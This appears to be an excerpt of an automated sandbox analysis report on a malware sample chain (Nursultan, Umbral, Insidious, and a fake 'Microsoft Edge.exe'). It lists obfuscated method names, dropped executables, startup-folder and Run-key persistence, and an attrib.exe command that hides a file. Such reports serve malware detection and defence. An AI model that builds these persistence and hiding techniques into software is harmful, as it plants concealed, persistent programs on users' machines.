                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, 4XGrZpv9Z38Gc.csHigh entropy of concatenated method names: 'MOPwIW0R07fM1', 'jNdANd8szwAta', 'RSPuqn2kFsUwp', 'bnCbfUC7Ig1zl', 'gRGXSeO4QPWkX', 'BntIUxBkGv7OS', 'fTSeHnVvfi3zN', '_5riJUWwBnV2mZ', 'zIfIEkk7yloMj', 'DsiXSixyLwTDL'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, JEjSKPz8UTQEy.csHigh entropy of concatenated method names: 'tDI3Dph7HsgRE', '_61dO3StYaJ5lalwW4FBBppX4Lf8V0hL9TiJC7wv2O4jR1V6wqF18Wnro77UImHXeCLBd7kOVBq4LFLfU6rULY8lryYd4iZIGnQ', 'ofsGZPiMRJ17GLZCmGyFhg6qzgZVbzmC8rF3aZ9e4xNG3s7fKxxMmT3dkVfUh3ocY1Am474GJWwWlbCUTdGe8Z0rWIpJZkHZgc', 'TMb4axt9d53yU7oSQOsL8F30wqLq5cGh9lkYCLhatOgw6mBNfMq7x9ifhOd9yXWx34kEchsmJaaffb9xXGdSKvova3mDx8nnkR', 'cw4fAbsQhBwsAOUmfPzTm7Im7hEoYLpj7h6DdiR1chDIs17LcFK6ETaiXxNaE3E45V7j5LVJFwInymeJRc6InyZdtLIOTNq8cJ'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, 8IQtID4yHRI2I.csHigh entropy of concatenated method names: 's5x2lUco1uh2F', 'JllsSjszFusOrh1r80WdehKzK447AX86KWm0WObcyR13ken6hkKJypliEIsKBKG9LLV9bPCjdx35almahfucfEaxI', '_0EyCxbfpY3wRxUmI3XJ6oyQQggDJ2giYI16MsPH2DAThC2Q4YglEEpxEyE4I5LTeElIBlkA29YY3lrFkensJ2xpRn', 'MOALjvURBajNzN1B8bhcrH6UgeebzgekkQUY7GEg9khEUGPZkHnnjjO84ytNUKyvytg2hRfn7ZeRyRFPsXQycN20w', 'zdb06ZbWaYhRC0FuRdeMXOfISatWl4gFUPuGFVNQT2czmXqcemNQpNg3iq2usbmQp3PfaVsi3fFfQyEzPydtTBKmQ', 'IIDYztLRxtISWQgWODkD1QWQHitlFYGx0byEdFwHoorGpjec9YsVdg7A9budCX0L9r6nXiQGB2ux5szvhM5WGcusI', 'wGkyX4N3b10y7zDTIYyFvKRiw19Hs1OnRKQsxB5mFYJXVPTTiTatUbehanm891fwgI422SaKqNW2Zcgn764HSMZD9', 'aTaDEm66wgUZ2PZLWu0YGha9a6Soc9QpUXUcPOXoCLY6Isa0KswTbymIxn0T3Bu2cofhVxVK3qU5Qso6L79dx6i49', '_5xPjqjnItAAhfCV8KStRnmYzgw7DP3gx0PTW8iKTDsHMWuZBVsh8wbsr8cg6DaiNC1qX9RBzRfW3K9DeVoeiLQf0m', 'Y8aXQY2wGU1JQgdPg54b3pIolW8tzLjCgzdVauHkZ8xeBTb5aVnDgNrsSSpGnC0xJduk93yKgdoNpQnFzRF61qOyp'

                            Persistence and Installation Behavior

                            barindex
                            Drops PE files with a suspicious file extension
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scrJump to dropped file
                            Uses attrib.exe to hide files
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeFile created: C:\Users\user\AppData\Local\Temp\Umbral.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile created: C:\Users\user\AppData\Roaming\Microsoft EdgeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scrJump to dropped file
                            Source: C:\Users\user\Desktop\Nursultan.exeFile created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeFile created: C:\Users\user\AppData\Local\Temp\Insidious.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeFile created: C:\Users\user\AppData\Local\Temp\Nursultan2.exeJump to dropped file
                            Source: C:\Users\user\Desktop\Nursultan.exeFile created: C:\Users\user\AppData\Local\Temp\Nursultan.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scrJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile created: C:\Users\user\AppData\Roaming\Microsoft EdgeJump to dropped file

                            Boot Survival

                            barindex
                            Drops PE files to the startup folder
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scrJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uOWQK.scr
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft EdgeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft EdgeJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
